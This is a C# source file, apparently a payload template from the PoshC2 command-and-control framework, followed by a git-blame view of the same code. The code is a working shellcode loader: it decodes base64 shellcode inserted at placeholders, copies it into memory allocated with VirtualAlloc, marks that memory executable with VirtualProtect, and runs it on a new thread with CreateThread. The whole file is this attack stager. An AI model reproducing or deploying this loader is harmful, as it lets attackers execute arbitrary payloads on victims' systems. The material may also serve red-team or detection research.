PoshC2_Python/Files/csc.cs

using System;
using System.Reflection;
using System.Diagnostics;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Threading;

class Program
    {
		[Flags()]
        public enum AllocationType : uint
        {
            COMMIT = 0x1000,
            RESERVE = 0x2000,
            RESET = 0x80000,
            LARGE_PAGES = 0x20000000,
            PHYSICAL = 0x400000,
            TOP_DOWN = 0x100000,
            WRITE_WATCH = 0x200000
        }

        public enum Protection
        {
            PAGE_NOACCESS = 0x01,
            PAGE_READONLY = 0x02,
            PAGE_READWRITE = 0x04,
            PAGE_WRITECOPY = 0x08,
            PAGE_EXECUTE = 0x10,
            PAGE_EXECUTE_READ = 0x20,
            PAGE_EXECUTE_READWRITE = 0x40,
            PAGE_EXECUTE_WRITECOPY = 0x80,
            PAGE_GUARD = 0x100,
            PAGE_NOCACHE = 0x200,
            PAGE_WRITECOMBINE = 0x400
        }

        [DllImport("kernel32.dll", SetLastError=true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect);

        [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        static extern IntPtr CreateThread(
                IntPtr lpThreadAttributes,
                uint dwStackSize,
                IntPtr lpStartAddress,
                IntPtr lpParameter,
                uint dwCreationFlags,
                out uint lpThreadId);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect);
		
        static void Main(string[] args)
        {
            byte[] shell = null;

            string safdsv64 = "#REPLACEME64#";
            string safdsv32 = "#REPLACEME32#";

            if (IntPtr.Size == 4)
            {
                // 32-bit sc
                shell = Convert.FromBase64String(safdsv32);
            }
            else if (IntPtr.Size == 8)
            {
                // 64-bit sc
                shell = Convert.FromBase64String(safdsv64);
            }

            IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);

            if( mem != IntPtr.Zero )
            {
                uint oldProt = 0;
                uint threadId = 0;
                Marshal.Copy(shell, 0, mem, shell.Length);
                VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt);
                CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId);
                WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset);
                wh.WaitOne();
            }
        }

}
'Added List-URLs Command to DB' 2018-10-10 07:16:32 +00:00			`using System;`
			`using System.Reflection;`
			`using System.Diagnostics;`
			`using System.Configuration.Install;`
			`using System.Runtime.InteropServices;`
			`using System.Threading;`

			`class Program`
			`{`
			`[Flags()]`
			`public enum AllocationType : uint`
			`{`
			`COMMIT = 0x1000,`
			`RESERVE = 0x2000,`
			`RESET = 0x80000,`
			`LARGE_PAGES = 0x20000000,`
			`PHYSICAL = 0x400000,`
			`TOP_DOWN = 0x100000,`
			`WRITE_WATCH = 0x200000`
			`}`

			`public enum Protection`
			`{`
			`PAGE_NOACCESS = 0x01,`
			`PAGE_READONLY = 0x02,`
			`PAGE_READWRITE = 0x04,`
			`PAGE_WRITECOPY = 0x08,`
			`PAGE_EXECUTE = 0x10,`
			`PAGE_EXECUTE_READ = 0x20,`
			`PAGE_EXECUTE_READWRITE = 0x40,`
			`PAGE_EXECUTE_WRITECOPY = 0x80,`
			`PAGE_GUARD = 0x100,`
			`PAGE_NOCACHE = 0x200,`
			`PAGE_WRITECOMBINE = 0x400`
			`}`

			`[DllImport("kernel32.dll", SetLastError=true)]`
			`static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect);`

			`[DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]`
			`static extern IntPtr CreateThread(`
			`IntPtr lpThreadAttributes,`
			`uint dwStackSize,`
			`IntPtr lpStartAddress,`
			`IntPtr lpParameter,`
			`uint dwCreationFlags,`
			`out uint lpThreadId);`

			`[DllImport("kernel32.dll", SetLastError = true)]`
			`static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect);`

			`static void Main(string[] args)`
			`{`
			`byte[] shell = null;`

			`string safdsv64 = "#REPLACEME64#";`
			`string safdsv32 = "#REPLACEME32#";`

			`if (IntPtr.Size == 4)`
			`{`
'Added CSC Output File to payloads' 2018-10-10 13:36:10 +00:00			`// 32-bit sc`
'Added List-URLs Command to DB' 2018-10-10 07:16:32 +00:00			`shell = Convert.FromBase64String(safdsv32);`
			`}`
			`else if (IntPtr.Size == 8)`
			`{`
'Added CSC Output File to payloads' 2018-10-10 13:36:10 +00:00			`// 64-bit sc`
'Added List-URLs Command to DB' 2018-10-10 07:16:32 +00:00			`shell = Convert.FromBase64String(safdsv64);`
			`}`

			`IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);`

			`if( mem != IntPtr.Zero )`
			`{`
			`uint oldProt = 0;`
			`uint threadId = 0;`
			`Marshal.Copy(shell, 0, mem, shell.Length);`
			`VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt);`
			`CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId);`
			`WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset);`
			`wh.WaitOne();`
			`}`
			`}`

			`}`